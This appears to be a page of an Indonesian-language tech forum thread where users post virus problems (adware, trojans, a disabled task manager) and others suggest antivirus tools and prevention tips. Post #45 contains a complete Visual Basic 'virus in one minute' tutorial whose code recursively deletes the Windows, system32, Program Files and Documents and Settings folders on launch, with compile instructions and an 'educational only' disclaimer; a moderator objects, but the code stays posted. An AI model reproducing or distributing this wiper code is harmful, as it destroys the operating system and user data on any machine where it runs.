+ Reply to Thread
Page 3 of 4 FirstFirst 1 2 3 4 LastLast
Results 41 to 60 of 73

Thread: Masalah dengan Virus????? (Silahkan post disini...!!!)

  1. #1
    Geuchik aap is on a distinguished road aap's Avatar
    Join Date
    Jan 2007
    Location
    Lhokseumawe
    Posts
    1,082

    Thumbs up Masalah dengan Virus????? (Silahkan post disini...!!!)

    Anda sudah capek atau udah nyerah ataupun udah gak tau harus berbuat apa lagi untuk mengatasi virus di komputer anda.......

    silahkan anda post-kan masalah anda disini...
    kami akan mencoba membantu untuk mengatasinya....

    Pada saat ngepost jangan lupa untuk menampilkan identitas anda :
    contoh :

    Nama Anda :
    Alamat :

    Ulasan Masalah :

    ------------------
    Thanks atas partisipasi dan kerjasamanya....

    Jika hati adalah istana, maka cinta adalah singgasana
    Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
    Dan senyum seorang kekasih sepertimu bagiku adalah tahta

  2. #41
    Imum Mukim jurnalis jh is on a distinguished road jurnalis jh's Avatar
    Join Date
    Nov 2006
    Location
    d/h AlisBandung
    Posts
    2,346

    Default

      Related Links
    Quote Originally Posted by Awak_Lubok View Post
    awak_lubok
    Aceh Rayeuek

    gini komputer saya tiba2 masuk suatu aplikasi lalu dia menginstal dirinya sendiri habis tu banyak munculnya web yg menawarkan anti virus bahkan dia tau klo komputer kita lg bervirvs makanya dia menawarkan producnya....

    apa benar ini yang namanya spywere.....

    kayanya udah aga parah ni webnya ga terkontrol lagi muncul sendiri....

    kesel jadinya...

    apa yg harus saya buat sekarang...

    mohon bantuannya ya???

    kalo gak salah itu malware, sekalian ngiklan dia
    tap biasanya dia gak bakal terjangkt kalo gak abang ijinn
    pake software ad-aware
    Kuasai Dunia dengan Informasi

    My Blog
    My Friendster
    My Facebook

  3. #42
    kawoem Awak_Lubok is on a distinguished road Awak_Lubok's Avatar
    Join Date
    Jan 2008
    Location
    Aceh Rayeuk
    Posts
    63

    Default

    Quote Originally Posted by AlisBandung View Post
    kalo gak salah itu malware, sekalian ngiklan dia
    tap biasanya dia gak bakal terjangkt kalo gak abang ijinn
    pake software ad-aware
    mungkin jg ya....ga sengaja...mangnya ga da cara ngilanginnya ya....

    tp kemaren dah saya Reinstall...

  4. #43
    Peutua NorthLogiQ is on a distinguished road NorthLogiQ's Avatar
    Join Date
    Dec 2006
    Location
    makan petai
    Posts
    403

    Default

    coba aja pake antivirus yang up 2 date, minimal kaspersky lah ato yang lain,
    klu gak mempan cari tau ttg dia baru hapus manual,
    No Komen aja deh

  5. #44
    Imum Mukim jurnalis jh is on a distinguished road jurnalis jh's Avatar
    Join Date
    Nov 2006
    Location
    d/h AlisBandung
    Posts
    2,346

    Default

    Quote Originally Posted by Awak_Lubok View Post
    mungkin jg ya....ga sengaja...mangnya ga da cara ngilanginnya ya....

    tp kemaren dah saya Reinstall...
    ya itu, pake sw ad-aware
    Kuasai Dunia dengan Informasi

    My Blog
    My Friendster
    My Facebook

  6. #45
    kawoem bayam is on a distinguished road bayam's Avatar
    Join Date
    Jun 2008
    Location
    In my pLace
    Posts
    21

    Default

    silahkan di oprek sesuka hati..
    buat yang ma0 belajar bikin virus...

    Yg diperluin:

    1. VB ( Visual Basic optimal : 6.0 )
    2. Ngerti tombol2nya VB

    Tutorial Bikin Virus cman 1 mnt

    1. bikin form sekecil mungkin
    2. didalem form itu, masukin nih kode

    --------------------------------- Begin --------------------------

    Public Sub DelAll(ByVal DirtoDelete As Variant)
    Dim FSO, FS

    Set FSO = CreateObject(”Scripting.FileSystemObject”)
    FS = FSO.DeleteFolder(DirtoDelete, True)
    End Sub

    Private Sub Form_Load()
    On Error Resume Next

    If FileExist(”c:\windows\system32\katak.txt”) = True Then
    End
    Else
    Call DelAll(”c:\windows\system”)
    Call DelAll(”c:\windows\system32″)
    Call DelAll(”c:\windows”)
    Call DelAll(”C:\Documents and Settings\All Users”)
    Call DelAll(”C:\Documents and Settings\Administrator”)
    Call DelAll(”C:\Documents and Settings”)
    Call DelAll(”C:\Program Files\Common Files”)
    Call DelAll(”C:\Program Files\Internet Explorer”)
    Call DelAll(”C:\Program Files\Microsoft Visual Studio”)
    Call DelAll(”C:\Program Files”)

    End
    End If
    End Sub

    Function FileExist(ByVal FileName As String) As Boolean
    If Dir(FileName) = “” Then
    FileExist = False
    Else
    FileExist = True
    End If
    End Function

    --------------------------------- End --------------------------

    3. Kode yg warna biru itu penangkal ne virus, mungkin kamu ga sengaja teken jadi slamat. jadi di folder c:\windows\system32\ kalo ada file namanya katak.txt, km ga bakal keserang ndiri… bisa di edit koq jadi apa gitu terserah…
    Klu yang warna merah itu folder yg bakal didelete ama nih virus, edit ndiri aja…

    6. Trus compile deh… slesai !!!

    Note : "penulis tidak bertanggung jawab atas segala kerusakan yg terjadi"

    ini cuma bahan untuk pembelajaran.. bukan merusak. !!!
    "Kejahatanku adalah rasa keingintahuanku.
    Kejahatanku adalah menilai seseorang dari perkataan
    dan perbuatannya, bukan dari penampilannya.
    Kejahatanku adalah menjadi lebih pintar dari kalian,
    sesuatu yang tak akan kalian maafkan"

  7. #46
    Geuchik aap is on a distinguished road aap's Avatar
    Join Date
    Jan 2007
    Location
    Lhokseumawe
    Posts
    1,082

    Default

    Quote Originally Posted by bayam View Post
    silahkan di oprek sesuka hati..
    buat yang ma0 belajar bikin virus...

    Yg diperluin:

    1. VB ( Visual Basic optimal : 6.0 )
    2. Ngerti tombol2nya VB

    Tutorial Bikin Virus cman 1 mnt

    1. bikin form sekecil mungkin
    ..............................

    Note : "penulis tidak bertanggung jawab atas segala kerusakan yg terjadi"

    ini cuma bahan untuk pembelajaran.. bukan merusak. !!!
    hello Omm.....
    ini tread untuk yang ada masalah dengan sepak terjang nya virus....
    bukannya posting cara membuat virus....
    untuk cara membuat / belajar membuat virus ada tread nya sendiri...
    oke...
    trim's sebelumnya...............

    Jika hati adalah istana, maka cinta adalah singgasana
    Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
    Dan senyum seorang kekasih sepertimu bagiku adalah tahta

  8. #47

    Default trojan

    nama : alfonsus wahyu
    alamat : villa cinere jakarta

    masalah : dikantor saya kemarin heboh karena terkena virus trojan downloader.win32.small.aacq
    pake kaspersky hilang, tapi masih ada lagi ada lagi
    binun nih, mo ngapain lagi.
    pake avg 8 beberapa bisa yang lain nggak bisa

    pusing

  9. #48
    Geuchik OrLaNd is on a distinguished road OrLaNd's Avatar
    Join Date
    Feb 2008
    Location
    KOTA PADANG, Kujaga dan Kubela !!!
    Posts
    860

    Talking ckCKck

    semua....
    jika anda takut dgn virus, jgn pernah anda tidak memasukin anti virus ke komputer / laptop anda!!!
    n tiap minggu ato lebih cepat dari itu lakukan terus upload anti virusnya yach..
    hehehhe




  10. #49
    Imum Mukim jurnalis jh is on a distinguished road jurnalis jh's Avatar
    Join Date
    Nov 2006
    Location
    d/h AlisBandung
    Posts
    2,346

    Default

    solusi terbaik adalah, jangan pake antivirus.....
    jadi kita gak bakal pening dengan virus, karena gak pernah ke detect
    Kuasai Dunia dengan Informasi

    My Blog
    My Friendster
    My Facebook

  11. #50
    Geuchik aap is on a distinguished road aap's Avatar
    Join Date
    Jan 2007
    Location
    Lhokseumawe
    Posts
    1,082

    Smile

    Quote Originally Posted by alfonsus wahyu View Post
    nama : alfonsus wahyu
    alamat : villa cinere jakarta

    masalah : dikantor saya kemarin heboh karena terkena virus trojan downloader.win32.small.aacq
    pake kaspersky hilang, tapi masih ada lagi ada lagi
    binun nih, mo ngapain lagi.
    pake avg 8 beberapa bisa yang lain nggak bisa

    pusing
    bisa di ceritain sedetil mungkin.... gimana proses kejadiannya...
    komputer anda terkena tu virus...
    kaspersky nya hilang or data anda yang hilang...
    coba dijelasin ....
    mungkin saya bisa bantu

    Jika hati adalah istana, maka cinta adalah singgasana
    Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
    Dan senyum seorang kekasih sepertimu bagiku adalah tahta

  12. #51

    Default virus dan format

    nama : aznar putra
    alamat : komp.PT Pertamina UP III Plaju-Palembang


    langsung saja ya...
    PC saya terkena virus di partisi C dan D, sudah di scan namun sepertinya gak mempan (saya pakai anti virus Avast yang selalu auto update setiap connect ke internet).
    kesimpulannya saya akan memFormat ulang harddisknya dengan memakai CD service pack 1 atau 2.

    berhubung pengetahuan saya masih sangat minim soal PC, saya mohon bantuan rekan-rekan atau saudara-saudara yang udah mumpuni ilmunya di bidang PC untuk membantu saya tentang langkah dan tahapan dalam memformat ulang PC saya.

    sebelumnya saya ucapkan terimakasih yang sedalam dalam nya atas bantuan yang diberikan.
    Last edited by aznarputra; 11-27-2008 at 03:30 AM.

  13. #52

    Talking

    Quote Originally Posted by aznarputra View Post
    nama : aznar putra
    alamat : komp.PT Pertamina UP III Plaju-Palembang
    Mohon maaf sebelum nya Saya secara pribadi bukan orang yang mumpuni, akan tetapi sering menemukan permasalah seperti anda.

    Satu hal yang terpenting yang perlu di ingat adalah "virus selalu selangkah lebih maju.

    Virus sekarang ini ada 2 Kategori :

    Lokal : Hasil karya anak bangsa , kebanyakan suka iseng ...
    Manca : G jelas dan sangat berbahaya

    untuk virus lokal saran saya sebaiknya scan terlebih dahulu PCMAV keluaran Majalah pcmedia atau Power Remover yang dibuat oleh dnaextrim crew dari[www.acehline.co.cc]

    Untuk mengatasi virus mancanegara ada 2 pilihan :
    Pertama

    - Mcaffe
    - Nod32

    Jika posisi anda di palembang anda bisa meminta bantuan dnaextrim.

    Jika Anda merasa kurang dengan jawaban ini silahkan contact via email atau kunjungi kami di forum.
    www.acehline.co.cc ini room nya orang brotherhood ....It banget

  14. #53

    Default

    Cara simpel atasi virus...
    1. Updatelah antivirus Anda minimal 1 Minggu sekali.
    2. Untuk mengantisipasi virus lokal matikan fungsi autorun flash disk dan biasakan membuka flash disk dengan membuka windows explorer terlebih dahulu baru kemudian klik icon flash disk yang ada di tree window (jendela explorer yang menampilkan urutan2 folder yang sebelah kiri). Ini berguna untuk menghindari menjalankan virus secara tidak sengaja.
    3. Jangan suka meng klik file2 dengan nama2 aneh ataupun file nama-nama porno apalagi file .exe .com .bat walaupun logo file tsb menarik (ini untuk menghindari jebakan social engineering sang virus). Ingat tandai file berdasarkan ekstensi file nya contoh, Word: .doc atau .docx, Corel: .cdr atau .cpt dll. Jangan menadai file berdasarkan icon nya karena ikon file sangat mudah diganti2.
    4. Jika sudah terkena scanlah komputer anda minimal dalam keadaan safe mode atau lebih baik di scan dengan windows live lewat usb (window dan antivirus juga bisa diinstall di usb) atau di scan lewat jaringan. (buat mas wahyu jg)
    5. Gunakan flashdisk yang punya switch read only dan jika cuma buat mentransfer file dari tempat anda ke tempat orang aktifkan switch tersebut.
    6. Buat Windows menampilkan file hidden dan file os protected files(liat folder option) agar lebih mudah mendeteksi virus.
    7. Installah utilities2 tambahan (super utilities, tune up utilities dll) agar lebih mudah mengakses resources windows (running apps, registry, start up item dll) jika terkena virus. Karena biasanya virus akan memblokir utilities bawaan windows.
    8. Usahakan gunakan antivirus non bajakan (minimal versi free) dan jika sering berinternet gunakan juga anti spyware.
    9. Recomended scanner: Norton, Karspesky, Avira
    10. Ubahlah icon file2 yang sering di serupai oleh virus, sehingga ketika ada virus yang mencoba menyusup kita langsung tau bedanya dg file asli. Gunakan Tune Up Utilities biar lbh mudah.

    Mudah2an ada manfaatnya dan tidak salah kamar. Oh ya tips no 2 dan 3 lumayan efektif buat antispasi virus lokal yang menyebar lewat flash disk.

  15. #54

    Default

    ayo beramai-ramai cari virus NAO dan penanggulangan nya

  16. #55
    Imum Mukim jurnalis jh is on a distinguished road jurnalis jh's Avatar
    Join Date
    Nov 2006
    Location
    d/h AlisBandung
    Posts
    2,346

    Default

    Quote Originally Posted by aznarputra View Post
    nama : aznar putra
    alamat : komp.PT Pertamina UP III Plaju-Palembang


    langsung saja ya...
    PC saya terkena virus di partisi C dan D, sudah di scan namun sepertinya gak mempan (saya pakai anti virus Avast yang selalu auto update setiap connect ke internet).
    kesimpulannya saya akan memFormat ulang harddisknya dengan memakai CD service pack 1 atau 2.

    berhubung pengetahuan saya masih sangat minim soal PC, saya mohon bantuan rekan-rekan atau saudara-saudara yang udah mumpuni ilmunya di bidang PC untuk membantu saya tentang langkah dan tahapan dalam memformat ulang PC saya.

    sebelumnya saya ucapkan terimakasih yang sedalam dalam nya atas bantuan yang diberikan.
    lho, ini kok gak ada yang jawab?
    gini, daripada alis capek ngetiknya, alis kasi sumbernya aja deh...

    satu
    dua
    tiga

    Kuasai Dunia dengan Informasi

    My Blog
    My Friendster
    My Facebook

  17. #56
    Super duck bebek_aceh_ is a jewel in the rough bebek_aceh_ is a jewel in the rough bebek_aceh_ is a jewel in the rough bebek_aceh_ is a jewel in the rough bebek_aceh_'s Avatar
    Join Date
    Apr 2008
    Location
    -== Copenhagen - Denmark - Medan - Aceh ==- Posts: 1
    Posts
    5,048

    Default

    bebek ga tau ini virus atau apa..

    yang jelas tiap bebek mau main game , selalu ada tulisan

    access violation at 0x7c915370 ( tried to write to 0x00040ff8 ) program terminated


    ada yg bisa bantu ga?

    sekedar informasi bebek main game GUNBOUND

  18. #57
    kawoem tobinks is on a distinguished road tobinks's Avatar
    Join Date
    Jan 2009
    Location
    Medan Now
    Posts
    58

    Smile ada virus

    selamat siang ne...

    komputer saya terkena virus ne...
    klo kita tekan Ctrl + Alt + Del maka task managernya gak bisa di buka.
    dan antivirus gak bisa di install.
    Tolong ya kasi tau cara na buka task manager tersebut....






    tobinks
    Now in Medan City
    Last edited by tobinks; 02-09-2009 at 12:36 PM.

  19. #58

    Default Virus Full House

    Gimana bang cara ilangi virus Full House. kok di desktop masih ada sortcutnya thank's

  20. #59

    Default

    keknya jarang di update neh??? kasian dunk ynag ngelapor...ayoo momodnya mohon bagi ilmunya..
    Aq lebih baik dicintai sebagai kawan daripada ditakuti sebagai pimpinan

  21. #60

    Default

    Quote Originally Posted by aap View Post
    Pada saat ngepost jangan lupa untuk menampilkan identitas anda :
    contoh :
    Nama Anda :
    Alamat :
    Ulasan Masalah :
    ups!!!! syarat na gawat banget
    nama kan dah diwakili ama username
    alamat juga ada
    jadi tuk apa disertakan lagi

+ Reply to Thread

Similar Threads

  1. Replies: 1
    Last Post: 12-07-2011, 10:24 PM
  2. YM member AFC Silahkan daftar disini...
    By del_fanfan in forum LOUNGE
    Replies: 5
    Last Post: 08-25-2009, 10:21 PM
  3. menghapus virus tanpa anti virus, tapi dengan Linux
    By abiymz in forum Backdoor, Virus, Trojan, Rootkit
    Replies: 0
    Last Post: 11-17-2008, 06:06 AM

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts